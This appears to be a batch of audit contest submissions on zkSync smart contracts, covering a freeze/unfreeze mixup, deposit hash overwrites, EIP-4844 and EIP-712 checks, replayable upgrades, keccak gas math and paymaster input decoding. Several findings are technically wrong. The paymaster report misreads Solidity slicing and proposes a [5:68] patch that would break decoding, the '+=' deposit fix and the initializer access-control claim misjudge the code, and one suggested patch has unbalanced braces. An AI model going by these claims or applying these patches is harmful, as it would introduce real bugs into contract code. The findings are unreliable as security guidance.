https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L143

Vulnerability details

Impact

Denial of service: when the State Transition Manager attempts to unfreeze a chain, unfreezeChain() calls freezeDiamond() again instead of unfreezeDiamond(), so a frozen chain can never be unfrozen.

Proof of Concept

 /// @dev freezes the specified chain
    function freezeChain(uint256 _chainId) external onlyOwner {
        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
    }

>>>    /// @dev freezes the specified chain
    function unfreezeChain(uint256 _chainId) external onlyOwner {
>>>        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
    }

The code above, from the StateTransitionManager contract, shows how freezing and unfreezing are performed. However, the unfreeze function is implemented incorrectly: it calls freezeDiamond() instead of unfreezeDiamond(). As a result, unfreezing is never possible, causing a denial of service.
The code below, from the Admin.sol contract, shows that implementations exist for both freezing and unfreezing, which confirms that the call in unfreezeChain(...) in the StateTransitionManager contract is an error that breaks protocol functionality.

   /// @inheritdoc IAdmin
    function freezeDiamond() external onlyAdminOrStateTransitionManager {
        Diamond.DiamondStorage storage diamondStorage = Diamond.getDiamondStorage();

        require(!diamondStorage.isFrozen, "a9"); // diamond proxy is frozen already
        diamondStorage.isFrozen = true;

        emit Freeze();
    }

    /// @inheritdoc IAdmin
    function unfreezeDiamond() external onlyAdminOrStateTransitionManager {
        Diamond.DiamondStorage storage diamondStorage = Diamond.getDiamondStorage();

        require(diamondStorage.isFrozen, "a7"); // diamond proxy is not frozen
        diamondStorage.isFrozen = false;

        emit Unfreeze();
    }
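The effect of the bug can be reproduced with a small Python model of the two contracts (a sketch with illustrative names; the Solidity revert strings "a9"/"a7" are kept as exception messages):

```python
class Diamond:
    """Minimal model of the Admin facet's isFrozen flag."""

    def __init__(self):
        self.is_frozen = False

    def freeze_diamond(self):
        if self.is_frozen:
            raise RuntimeError("a9")  # diamond proxy is frozen already
        self.is_frozen = True

    def unfreeze_diamond(self):
        if not self.is_frozen:
            raise RuntimeError("a7")  # diamond proxy is not frozen
        self.is_frozen = False


class StateTransitionManager:
    """Model of the manager with the bug under discussion."""

    def __init__(self, diamond):
        self.diamond = diamond

    def freeze_chain(self):
        self.diamond.freeze_diamond()

    def unfreeze_chain(self):
        # Bug: calls freeze_diamond() instead of unfreeze_diamond(),
        # so this always reverts once the chain is frozen.
        self.diamond.freeze_diamond()
```

Once freeze_chain() succeeds, every subsequent unfreeze_chain() call hits the "a9" revert, leaving the chain frozen forever.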

Tools Used

Manual Review

Recommended Mitigation Steps

The protocol should apply the correction shown below:

 /// @dev freezes the specified chain
    function freezeChain(uint256 _chainId) external onlyOwner {
        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
    }

---    /// @dev freezes the specified chain
+++    /// @dev unfreezes the specified chain
    function unfreezeChain(uint256 _chainId) external onlyOwner {
---        IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
+++        IZkSyncStateTransition(stateTransition[_chainId]).unfreezeDiamond();
    }

Assessed type

Error

Unclaimed Failed Deposit Would Be Lost Due to Override by a New Failed Deposit Transaction Data Hash

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L600

Vulnerability details

Impact

If a failed deposit has not yet been claimed, a new deposit can override its transaction data hash, because there is no validation before the mapping entry is reset. This can lead to loss of funds in the L1SharedBridge contract.

Proof of Concept

 function depositLegacyErc20Bridge(
        address _prevMsgSender,
        address _l2Receiver,
        address _l1Token,
        uint256 _amount,
        uint256 _l2TxGasLimit,
        uint256 _l2TxGasPerPubdataByte,
        address _refundRecipient
    ) external payable override onlyLegacyBridge nonReentrant returns (bytes32 l2TxHash) {
        require(l2BridgeAddress[ERA_CHAIN_ID] != address(0), "ShB b. n dep");
        require(_l1Token != l1WethAddress, "ShB: WETH deposit not supported 2");

        // Note that funds have been transferred to this contract in the legacy ERC20 bridge.
        if (!hyperbridgingEnabled[ERA_CHAIN_ID]) {
            chainBalance[ERA_CHAIN_ID][_l1Token] += _amount;
        }

        bytes memory l2TxCalldata = _getDepositL2Calldata(_prevMsgSender, _l2Receiver, _l1Token, _amount);

        {
            // If the refund recipient is not specified, the refund will be sent to the sender of the transaction.
            // Otherwise, the refund will be sent to the specified address.
            // If the recipient is a contract on L1, the address alias will be applied.
            address refundRecipient = _refundRecipient;
            if (_refundRecipient == address(0)) {
                refundRecipient = _prevMsgSender != tx.origin
                    ? AddressAliasHelper.applyL1ToL2Alias(_prevMsgSender)
                    : _prevMsgSender;
            }

            L2TransactionRequestDirect memory request = L2TransactionRequestDirect({
                chainId: ERA_CHAIN_ID,
                l2Contract: l2BridgeAddress[ERA_CHAIN_ID],
                mintValue: msg.value, // l2 gas + l2 msg.Value the bridgehub will withdraw the mintValue from the base token bridge for gas
                l2Value: 0, // L2 msg.value, this contract doesn't support base token deposits or wrapping functionality, for direct deposits use bridgehub
                l2Calldata: l2TxCalldata,
                l2GasLimit: _l2TxGasLimit,
                l2GasPerPubdataByteLimit: _l2TxGasPerPubdataByte,
                factoryDeps: new bytes[](0),
                refundRecipient: refundRecipient
            });
            l2TxHash = bridgehub.requestL2TransactionDirect{value: msg.value}(request);
        }

        bytes32 txDataHash = keccak256(abi.encode(_prevMsgSender, _l1Token, _amount));
        // Save the deposited amount to claim funds on L1 if the deposit failed on L2
>>>        depositHappened[ERA_CHAIN_ID][l2TxHash] = txDataHash;

        emit LegacyDepositInitiated(ERA_CHAIN_ID, l2TxHash, _prevMsgSender, _l2Receiver, _l1Token, _amount);
    }

The code above shows how the depositLegacyErc20Bridge(...) function is implemented in the L1SharedBridge contract. The point of interest is how depositHappened[ERA_CHAIN_ID][l2TxHash] is assigned the value of txDataHash. The problem is that if a previous transaction data hash has not yet been claimed at L340 and depositLegacyErc20Bridge(...) is called with a new transaction data hash, the new value overrides the old one without reverting, thereby causing loss of funds.
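The claimed overwrite can be sketched with a dictionary standing in for the depositHappened mapping (hypothetical helper names; the checked variant adds the missing emptiness check):

```python
EMPTY = b"\x00" * 32

def record_deposit(deposit_happened, l2_tx_hash, tx_data_hash):
    # Current behavior: any previous (possibly unclaimed) entry is overwritten.
    deposit_happened[l2_tx_hash] = tx_data_hash

def record_deposit_checked(deposit_happened, l2_tx_hash, tx_data_hash):
    # Checked behavior: revert if an entry already exists for this tx hash.
    if deposit_happened.get(l2_tx_hash, EMPTY) != EMPTY:
        raise RuntimeError("ShB tx hap")
    deposit_happened[l2_tx_hash] = tx_data_hash
```

In the unchecked variant, the first record is silently lost; in the checked variant, the second call reverts and the original entry survives.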

Tools Used

Manual Review

Recommended Mitigation Steps

An implementation similar to L237 should ensure that the unclaimed failed deposit entry is empty before it is reset. The adjustment would look like this:

 function depositLegacyErc20Bridge(
        address _prevMsgSender,
        address _l2Receiver,
        address _l1Token,
        uint256 _amount,
        uint256 _l2TxGasLimit,
        uint256 _l2TxGasPerPubdataByte,
        address _refundRecipient
    ) external payable override onlyLegacyBridge nonReentrant returns (bytes32 l2TxHash) {
        require(l2BridgeAddress[ERA_CHAIN_ID] != address(0), "ShB b. n dep");
        require(_l1Token != l1WethAddress, "ShB: WETH deposit not supported 2");

        // Note that funds have been transferred to this contract in the legacy ERC20 bridge.
        if (!hyperbridgingEnabled[ERA_CHAIN_ID]) {
            chainBalance[ERA_CHAIN_ID][_l1Token] += _amount;
        }

        bytes memory l2TxCalldata = _getDepositL2Calldata(_prevMsgSender, _l2Receiver, _l1Token, _amount);

        {
            ...
        }

        bytes32 txDataHash = keccak256(abi.encode(_prevMsgSender, _l1Token, _amount));
        // Save the deposited amount to claim funds on L1 if the deposit failed on L2
+++     require(depositHappened[ERA_CHAIN_ID][l2TxHash] == 0x00, "ShB tx hap");
        depositHappened[ERA_CHAIN_ID][l2TxHash] = txDataHash;

        emit LegacyDepositInitiated(ERA_CHAIN_ID, l2TxHash, _prevMsgSender, _l2Receiver, _l1Token, _amount);
    }

Assessed type

Context

`Executor.sol` does not respect EIP-4844

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Executor.sol#L605-L619

Vulnerability details

Impact

Function Executor.sol#_pointEvaluationPrecompile() does not work as expected due to missing constraint checking for the returned result.

Proof of Concept

  • According to EIP-4844, the returned result is 64 bytes: the first 32 bytes are Bytes(U256(FIELD_ELEMENTS_PER_BLOB).to_be_bytes32()) and the last 32 bytes are U256(BLS_MODULUS).to_be_bytes32().

def point_evaluation_precompile(input: Bytes) -> Bytes:
----SNIP----
    # Return FIELD_ELEMENTS_PER_BLOB and BLS_MODULUS as padded 32 byte big endian values
    return Bytes(U256(FIELD_ELEMENTS_PER_BLOB).to_be_bytes32() + U256(BLS_MODULUS).to_be_bytes32())

  • Take a look at Executor.sol#_pointEvaluationPrecompile() here:
File: Executor.sol
601    /// @notice Calls the point evaluation precompile and verifies the output
602    /// Verify p(z) = y given commitment that corresponds to the polynomial p(x) and a KZG proof.
603    /// Also verify that the provided commitment matches the provided versioned_hash.
604    ///
605    function _pointEvaluationPrecompile(
606        bytes32 _versionedHash,
607        bytes32 _openingPoint,
608        bytes calldata _openingValueCommitmentProof
609    ) internal view {
610        bytes memory precompileInput = abi.encodePacked(_versionedHash, _openingPoint, _openingValueCommitmentProof);
611
612        (bool success, bytes memory data) = POINT_EVALUATION_PRECOMPILE_ADDR.staticcall(precompileInput);
613
614        // We verify that the point evaluation precompile call was successful by testing the latter 32 bytes of the
615        // response is equal to BLS_MODULUS as defined in https://eips.ethereum.org/EIPS/eip-4844#point-evaluation-precompile
616        require(success, "failed to call point evaluation precompile");
617        (, uint256 result) = abi.decode(data, (uint256, uint256));
618        require(result == BLS_MODULUS, "precompile unexpected output");
619    }
  • On L612, after data is returned, there is no check that its length is exactly 64 bytes.
  • On L618, result is only compared against BLS_MODULUS; the first returned word is never compared against FIELD_ELEMENTS_PER_BLOB.
  • This can lead to unexpected precompile results being accepted.
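The full check of the precompile's return value, as this finding recommends, can be sketched in Python (constants per EIP-4844: 4096 field elements per blob and the BLS12-381 scalar field modulus):

```python
FIELD_ELEMENTS_PER_BLOB = 4096
BLS_MODULUS = 52435875175126190479447740508185965837690552500527637822603658699938581184513

def check_point_evaluation_output(data: bytes) -> None:
    # The precompile must return exactly 64 bytes:
    # FIELD_ELEMENTS_PER_BLOB and BLS_MODULUS as 32-byte big-endian words.
    if len(data) != 64:
        raise ValueError("invalid data")
    first = int.from_bytes(data[:32], "big")
    second = int.from_bytes(data[32:], "big")
    if first != FIELD_ELEMENTS_PER_BLOB or second != BLS_MODULUS:
        raise ValueError("precompile unexpected output")
```

A well-formed output passes; a truncated output or a wrong first word is rejected, which is exactly what the Solidity code currently does not enforce.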

Tools Used

Manual review and https://eips.ethereum.org/EIPS/eip-4844#point-evaluation-precompile

Recommended Mitigation Steps

Consider changing the implementation to:

File: Executor.sol
    function _pointEvaluationPrecompile(
        bytes32 _versionedHash,
        bytes32 _openingPoint,
        bytes calldata _openingValueCommitmentProof
    ) internal view {
        bytes memory precompileInput = abi.encodePacked(_versionedHash, _openingPoint, _openingValueCommitmentProof);


        (bool success, bytes memory data) = POINT_EVALUATION_PRECOMPILE_ADDR.staticcall(precompileInput);


        // We verify that the point evaluation precompile call was successful by testing the latter 32 bytes of the
        // response is equal to BLS_MODULUS as defined in https://eips.ethereum.org/EIPS/eip-4844#point-evaluation-precompile
        require(success, "failed to call point evaluation precompile");
+++        if (data.length != 64) revert INVALID_DATA();
---        (, uint256 result) = abi.decode(data, (uint256, uint256));
---        require(result == BLS_MODULUS, "precompile unexpected output");
+++        bytes32 first;
+++        bytes32 second;
+++        assembly {
+++            first := mload(add(data, 32))
+++            second := mload(add(data, 64))
+++        }
+++        if (uint256(first) != FIELD_ELEMENTS_PER_BLOB || uint256(second) != BLS_MODULUS) {
+++            revert UNEXPECTED_OUTPUT();
        }
    }

Assessed type

Other

L2SharedBridge.finalizeDeposit will not work for legacy bridge

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/zksync/contracts/bridge/L2SharedBridge.sol#L87-L91

Vulnerability details

Proof of Concept

The L2SharedBridge.finalizeDeposit function may be called either by the L1 shared bridge or by the legacy bridge.

The problem is that the legacy bridge address is not stored during initialization, so finalization of legacy deposits will not work.

Impact

Finalization of legacy deposits will not work.

Tools Used

VsCode

Recommended Mitigation Steps

Store the l1LegacyBridge address during initialization.

Assessed type

Error

`TransactionHelper.sol` violates EIP-712

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L84-L87
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L25-L71
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L118-L136

Vulnerability details

Impact

According to the EIP-712 spec, the typehash should contain all fields defined in the struct.
The current implementation of EIP712_TRANSACTION_TYPE_HASH, however, is missing the signature field.

Proof of Concept

File: TransactionHelper.sol

bytes32 constant EIP712_TRANSACTION_TYPE_HASH =
        keccak256(
            "Transaction(uint256 txType,uint256 from,uint256 to,uint256 gasLimit,uint256 gasPerPubdataByteLimit,uint256 maxFeePerGas,uint256 maxPriorityFeePerGas,uint256 paymaster,uint256 nonce,uint256 value,bytes data,bytes32[] factoryDeps,bytes paymasterInput)"
        );

EIP712_TRANSACTION_TYPE_HASH is defined as above.

File: TransactionHelper.sol

struct Transaction {
    // The type of the transaction.
    uint256 txType;
    // The caller.
    uint256 from;
    // The callee.
    uint256 to;
    // The gasLimit to pass with the transaction.
    // It has the same meaning as Ethereum's gasLimit.
    uint256 gasLimit;
    // The maximum amount of gas the user is willing to pay for a byte of pubdata.
    uint256 gasPerPubdataByteLimit;
    // The maximum fee per gas that the user is willing to pay.
    // It is akin to EIP1559's maxFeePerGas.
    uint256 maxFeePerGas;
    // The maximum priority fee per gas that the user is willing to pay.
    // It is akin to EIP1559's maxPriorityFeePerGas.
    uint256 maxPriorityFeePerGas;
    // The transaction's paymaster. If there is no paymaster, it is equal to 0.
    uint256 paymaster;
    // The nonce of the transaction.
    uint256 nonce;
    // The value to pass with the transaction.
    uint256 value;
    // In the future, we might want to add some
    // new fields to the struct. The `txData` struct
    // is to be passed to account and any changes to its structure
    // would mean a breaking change to these accounts. In order to prevent this,
    // we should keep some fields as "reserved".
    // It is also recommended that their length is fixed, since
    // it would allow easier proof integration (in case we will need
    // some special circuit for preprocessing transactions).
    uint256[4] reserved;
    // The transaction's calldata.
    bytes data;
    // The signature of the transaction.
    bytes signature;
    // The properly formatted hashes of bytecodes that must be published on L1
    // with the inclusion of this transaction. Note, that a bytecode has been published
    // before, the user won't pay fees for its republishing.
    bytes32[] factoryDeps;
    // The input to the paymaster.
    bytes paymasterInput;
    // Reserved dynamic type for the future use-case. Using it should be avoided,
    // But it is still here, just in case we want to enable some additional functionality.
    bytes reservedDynamic;
}

While struct Transaction is defined as above.

We can clearly see that the signature field defined in the Transaction struct is not included in EIP712_TRANSACTION_TYPE_HASH.

Moreover, when we examine the _encodeHashEIP712Transaction() function, the signature is missing there as well.

File: TransactionHelper.sol

function _encodeHashEIP712Transaction(Transaction calldata _transaction) private view returns (bytes32) {
        bytes32 structHash = keccak256(
            abi.encode(
                EIP712_TRANSACTION_TYPE_HASH,
                _transaction.txType,
                _transaction.from,
                _transaction.to,
                _transaction.gasLimit,
                _transaction.gasPerPubdataByteLimit,
                _transaction.maxFeePerGas,
                _transaction.maxPriorityFeePerGas,
                _transaction.paymaster,
                _transaction.nonce,
                _transaction.value,
                EfficientCall.keccak(_transaction.data),
                keccak256(abi.encodePacked(_transaction.factoryDeps)),
                EfficientCall.keccak(_transaction.paymasterInput)
            )
        );
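The mismatch can be checked mechanically. A small Python sketch compares the struct's field names against the fields encoded in the type string (note that reserved and reservedDynamic are also absent, in addition to signature; helper names are illustrative):

```python
TYPE_STRING = (
    "Transaction(uint256 txType,uint256 from,uint256 to,uint256 gasLimit,"
    "uint256 gasPerPubdataByteLimit,uint256 maxFeePerGas,uint256 maxPriorityFeePerGas,"
    "uint256 paymaster,uint256 nonce,uint256 value,bytes data,bytes32[] factoryDeps,"
    "bytes paymasterInput)"
)

# Field names of the Transaction struct, in declaration order.
STRUCT_FIELDS = [
    "txType", "from", "to", "gasLimit", "gasPerPubdataByteLimit",
    "maxFeePerGas", "maxPriorityFeePerGas", "paymaster", "nonce", "value",
    "reserved", "data", "signature", "factoryDeps", "paymasterInput",
    "reservedDynamic",
]

def typehash_fields(type_string: str) -> list:
    # Extract the member names from "Type(type1 name1,type2 name2,...)".
    inner = type_string[type_string.index("(") + 1 : type_string.rindex(")")]
    return [member.split()[-1] for member in inner.split(",")]

missing = [f for f in STRUCT_FIELDS if f not in typehash_fields(TYPE_STRING)]
```

Running this shows that the typehash omits reserved, signature, and reservedDynamic; this finding concerns the signature field specifically.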

Tools Used

Manual code review

Recommended Mitigation Steps

Add the missing signature field to the typehash and to the struct hash encoding.

Assessed type

Other

It's possible to replay some upgrade transactions

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/libraries/TransactionValidator.sol#L55
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L118-L136

Vulnerability details

Impact

The reserved field is not taken into account when encoding the hash of the zkSync native transaction type (TransactionHelper._encodeHashEIP712Transaction()).

Moreover, according to TransactionValidator.validateUpgradeTransaction(), an upgrade transaction is valid when reserved[1] <= type(uint160).max. This means it is possible to replay an upgrade transaction by providing a different value for the reserved[1] field.

Proof of Concept

File: TransactionValidator.sol

        require(_transaction.reserved[0] == 0, "ue");
        require(_transaction.reserved[1] <= type(uint160).max, "uf");
        require(_transaction.reserved[2] == 0, "ug");
        require(_transaction.reserved[3] == 0, "uo");

While reserved[0], reserved[2], and reserved[3] must equal 0, reserved[1] only needs to be lower than or equal to type(uint160).max.

File: TransactionHelper.sol

function _encodeHashEIP712Transaction(Transaction calldata _transaction) private view returns (bytes32) {
        bytes32 structHash = keccak256(
            abi.encode(
                EIP712_TRANSACTION_TYPE_HASH,
                _transaction.txType,
                _transaction.from,
                _transaction.to,
                _transaction.gasLimit,
                _transaction.gasPerPubdataByteLimit,
                _transaction.maxFeePerGas,
                _transaction.maxPriorityFeePerGas,
                _transaction.paymaster,
                _transaction.nonce,
                _transaction.value,
                EfficientCall.keccak(_transaction.data),
                keccak256(abi.encodePacked(_transaction.factoryDeps)),
                EfficientCall.keccak(_transaction.paymasterInput)
            )
        );

Since the reserved field is not taken into account in _encodeHashEIP712Transaction(), it is possible to replay some transactions with a different _transaction.reserved[1].

  1. Create a valid upgrade transaction and send it. Assume its reserved field is set to [0, 1, 0, 0].
  2. Take that transaction and modify reserved[1]: now reserved is [0, 2, 0, 0].
  3. Since require(_transaction.reserved[1] <= type(uint160).max, "uf"); still passes (line 55 in TransactionValidator.sol), the whole upgrade transaction remains valid and can be replayed.
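The replay follows from the fact that the struct hash simply never reads reserved. A Python sketch (sha256 standing in for keccak256; the field set is taken from _encodeHashEIP712Transaction() above, and the encoding is illustrative, not real ABI encoding):

```python
import hashlib

# The fields that _encodeHashEIP712Transaction() actually encodes;
# `reserved` is deliberately absent, mirroring the Solidity code.
HASHED_FIELDS = [
    "txType", "from", "to", "gasLimit", "gasPerPubdataByteLimit",
    "maxFeePerGas", "maxPriorityFeePerGas", "paymaster", "nonce",
    "value", "data", "factoryDeps", "paymasterInput",
]

def encode_hash(tx: dict) -> bytes:
    blob = b"".join(repr(tx[field]).encode() for field in HASHED_FIELDS)
    return hashlib.sha256(blob).digest()  # keccak256 stand-in

base = {field: 0 for field in HASHED_FIELDS}
tx_a = dict(base, reserved=[0, 1, 0, 0])
tx_b = dict(base, reserved=[0, 2, 0, 0])  # differs only in reserved[1]
```

Two transactions that differ only in reserved[1] produce the same hash, which is the replay condition described in the steps above.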

Tools Used

Manual code review

Recommended Mitigation Steps

The reserved fields should have constant values as long as they are not taken into account in TransactionHelper._encodeHashEIP712Transaction().
This means that line 55 in TransactionValidator.sol should be changed from require(_transaction.reserved[1] <= type(uint160).max, "uf"); to require(_transaction.reserved[1] == 0, "uf");.

Assessed type

Other

`depositAmount` is not properly updated in `L1ERC20Bridge.deposit()`

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1ERC20Bridge.sol#L154

Vulnerability details

Impact

Function L1ERC20Bridge.deposit() initiates a deposit by locking funds in the contract and sending a request to process an L2 transaction in which tokens will be minted.
The deposited amount is assigned to the depositAmount[msg.sender][_l1Token][l2TxHash] mapping.
However, calling deposit() does not increase depositAmount[msg.sender][_l1Token][l2TxHash]; it overwrites the old value.
This implies that when a user calls deposit() more than once, they suffer a loss of funds, because the old value of depositAmount[msg.sender][_l1Token][l2TxHash] is overwritten by the new one.

Proof of Concept

File: L1ERC20Bridge.sol

depositAmount[msg.sender][_l1Token][l2TxHash] = _amount;

As demonstrated above, depositAmount[msg.sender][_l1Token][l2TxHash] is not increased by _amount; it is simply overwritten.

  1. The user calls deposit() with _amount set to 100.
  2. The user calls deposit() again, with _amount set to 50.
  3. depositAmount[msg.sender][_l1Token][l2TxHash] should now be 150 (100 from the first call plus 50 from the second).
  4. However, because of the = operator, depositAmount[msg.sender][_l1Token][l2TxHash] is actually 50 (the second call overwrote the _amount set during the first).
  5. The user suffers a loss, because the depositAmount[msg.sender][_l1Token][l2TxHash] mapping records a deposit of only 50, while they deposited 150.
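The difference between the two operators can be shown with a dictionary standing in for the depositAmount mapping (illustrative helper names):

```python
def record_overwrite(deposits, key, amount):
    # Current behavior: plain assignment discards any earlier deposit.
    deposits[key] = amount

def record_accumulate(deposits, key, amount):
    # Suggested fix: accumulate, so repeated deposits add up.
    deposits[key] = deposits.get(key, 0) + amount
```

With deposits of 100 and then 50 under the same key, the overwrite variant records 50 while the accumulate variant records 150, matching the scenario above.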

Tools Used

Manual code review

Recommended Mitigation Steps

Change:

depositAmount[msg.sender][_l1Token][l2TxHash] = _amount;

to:

depositAmount[msg.sender][_l1Token][l2TxHash] += _amount;

Assessed type

Context

Incorrect calculation of `keccakGasCost`

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/L1Messenger.sol#L50-L51

Vulnerability details

Impact

The keccakGasCost is not calculated correctly: it is greater than expected.
This issue leads to user fund loss, because in some scenarios users pay more gas than they should.

Proof of Concept

File: L1Messenger.sol

    function keccakGasCost(uint256 _length) internal pure returns (uint256) {
        return KECCAK_ROUND_GAS_COST * (_length / KECCAK_ROUND_NUMBER_OF_BYTES + 1);
    }
  • Let's consider a scenario where _length == KECCAK_ROUND_NUMBER_OF_BYTES.

keccakGasCost(KECCAK_ROUND_NUMBER_OF_BYTES) = KECCAK_ROUND_GAS_COST * (KECCAK_ROUND_NUMBER_OF_BYTES / KECCAK_ROUND_NUMBER_OF_BYTES + 1) = KECCAK_ROUND_GAS_COST * 2.
When _length is KECCAK_ROUND_NUMBER_OF_BYTES, the cost of keccak should actually be KECCAK_ROUND_GAS_COST; however, it is twice as big as it should be.

In other words, when _length is of the form N * KECCAK_ROUND_NUMBER_OF_BYTES (_length is divisible by KECCAK_ROUND_NUMBER_OF_BYTES), the computed keccak cost includes one extra KECCAK_ROUND_GAS_COST.

For keccakGasCost(N * KECCAK_ROUND_NUMBER_OF_BYTES) the cost should be exactly N * KECCAK_ROUND_GAS_COST; however, the function keccakGasCost() returns:
keccakGasCost(N * KECCAK_ROUND_NUMBER_OF_BYTES) = KECCAK_ROUND_GAS_COST * (N * KECCAK_ROUND_NUMBER_OF_BYTES / KECCAK_ROUND_NUMBER_OF_BYTES + 1) = KECCAK_ROUND_GAS_COST * (N + 1) = N * KECCAK_ROUND_GAS_COST + KECCAK_ROUND_GAS_COST. As we can see, there is one extra KECCAK_ROUND_GAS_COST.
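The current formula and the exact-multiple behavior this finding expects can be contrasted in a short Python sketch (constant values are illustrative, not the ones defined in L1Messenger.sol):

```python
KECCAK_ROUND_GAS_COST = 40          # illustrative value
KECCAK_ROUND_NUMBER_OF_BYTES = 136  # keccak-256 rate in bytes

def keccak_gas_cost_current(length: int) -> int:
    # Mirrors the Solidity: an extra round is always charged, even when
    # length is an exact multiple of the round size.
    return KECCAK_ROUND_GAS_COST * (length // KECCAK_ROUND_NUMBER_OF_BYTES + 1)

def keccak_gas_cost_ceil(length: int) -> int:
    # Ceiling division: charge exactly the number of full rounds needed.
    rounds = (length + KECCAK_ROUND_NUMBER_OF_BYTES - 1) // KECCAK_ROUND_NUMBER_OF_BYTES
    return KECCAK_ROUND_GAS_COST * rounds
```

For lengths that are not exact multiples of the round size the two formulas agree; on exact multiples the current one charges one extra round.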

Tools Used

Manual code review

Recommended Mitigation Steps

When _length == N * KECCAK_ROUND_NUMBER_OF_BYTES, function keccakGasCost() should return N * KECCAK_ROUND_GAS_COST instead of (N + 1) * KECCAK_ROUND_GAS_COST.

Assessed type

Math

QA Report

See the markdown file with the details of this report here.

Initialize function can be called by any external address

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L79
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L104

Vulnerability details

Impact

The lack of any access control allows any external address to call the initialize function.

Proof of Concept

Consider the initialize function:

function initialize(StateTransitionManagerInitializeData calldata _initializeData) external reentrancyGuardInitializer {
    require(_initializeData.governor != address(0), "StateTransition: governor zero");
    _transferOwnership(_initializeData.governor);

    // Initialization logic...
}

The absence of an explicit access control modifier is a serious security issue, as it could permit an attacker to reinitialize the contract or tamper with its state.

Tools Used

Manual Review

Recommended Mitigation Steps

The onlyOwner modifier or an appropriate access control mechanism (for example, a require statement on msg.sender) should be added to the function.

Assessed type

Access Control

Wrong Execution Due to Paymaster Input Overlap in the TransactionHelper Contract

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/system-contracts/contracts/libraries/TransactionHelper.sol#L374

Vulnerability details

Impact

Wrong execution due to paymaster input overlap in the TransactionHelper contract.

Proof of Concept

 function processPaymasterInput(Transaction calldata _transaction) internal {
        require(_transaction.paymasterInput.length >= 4, "The standard paymaster input must be at least 4 bytes long");

>>>        bytes4 paymasterInputSelector = bytes4(_transaction.paymasterInput[0:4]);
        if (paymasterInputSelector == IPaymasterFlow.approvalBased.selector) {
            require(
                _transaction.paymasterInput.length >= 68,
                "The approvalBased paymaster input must be at least 68 bytes long"
            );

            // While the actual data consists of address, uint256 and bytes data,
            // the data is needed only for the paymaster, so we ignore it here for the sake of optimization
>>>            (address token, uint256 minAllowance) = abi.decode(_transaction.paymasterInput[4:68], (address, uint256));
            address paymaster = address(uint160(_transaction.paymaster));

            uint256 currentAllowance = IERC20(token).allowance(address(this), paymaster);
            if (currentAllowance < minAllowance) {
                // Some tokens, e.g. USDT require that the allowance is firsty set to zero
                // and only then updated to the new value.

                IERC20(token).safeApprove(paymaster, 0);
                IERC20(token).safeApprove(paymaster, minAllowance);
            }
        } else if (paymasterInputSelector == IPaymasterFlow.general.selector) {
            // Do nothing. general(bytes) paymaster flow means that the paymaster must interpret these bytes on his own.
        } else {
            revert("Unsupported paymaster flow");
        }
    }

The code above shows how processPaymasterInput(...) is implemented in the TransactionHelper contract. The first marked line shows that paymasterInputSelector is derived from bytes4(_transaction.paymasterInput[0:4]). The problem, shown at the second marked line, is that token and minAllowance are later decoded from _transaction.paymasterInput[4:68] instead of _transaction.paymasterInput[5:68]: since the data for paymasterInputSelector spans bytes 0 to 4, the values for token and minAllowance should start from byte 5, not byte 4.

Tools Used

Manual Review

Recommended Mitigation Steps

The protocol should make the necessary adjustment to prevent the input value overlap, which could otherwise break the protocol. The adjustment is provided below:

 function processPaymasterInput(Transaction calldata _transaction) internal {
        require(_transaction.paymasterInput.length >= 4, "The standard paymaster input must be at least 4 bytes long");

        bytes4 paymasterInputSelector = bytes4(_transaction.paymasterInput[0:4]);
        if (paymasterInputSelector == IPaymasterFlow.approvalBased.selector) {
            require(
                _transaction.paymasterInput.length >= 68,
                "The approvalBased paymaster input must be at least 68 bytes long"
            );

            // While the actual data consists of address, uint256 and bytes data,
            // the data is needed only for the paymaster, so we ignore it here for the sake of optimization
---            (address token, uint256 minAllowance) = abi.decode(_transaction.paymasterInput[4:68], (address, uint256));
+++            (address token, uint256 minAllowance) = abi.decode(_transaction.paymasterInput[5:68], (address, uint256));
            address paymaster = address(uint160(_transaction.paymaster));

            uint256 currentAllowance = IERC20(token).allowance(address(this), paymaster);
            if (currentAllowance < minAllowance) {
                // Some tokens, e.g. USDT require that the allowance is firsty set to zero
                // and only then updated to the new value.

                IERC20(token).safeApprove(paymaster, 0);
                IERC20(token).safeApprove(paymaster, minAllowance);
            }
        } else if (paymasterInputSelector == IPaymasterFlow.general.selector) {
            // Do nothing. general(bytes) paymaster flow means that the paymaster must interpret these bytes on his own.
        } else {
            revert("Unsupported paymaster flow");
        }
    }

Assessed type

Context

QA Report

See the markdown file with the details of this report here.

Incorrect `_setVerifierParams()` implementation

Lines of code

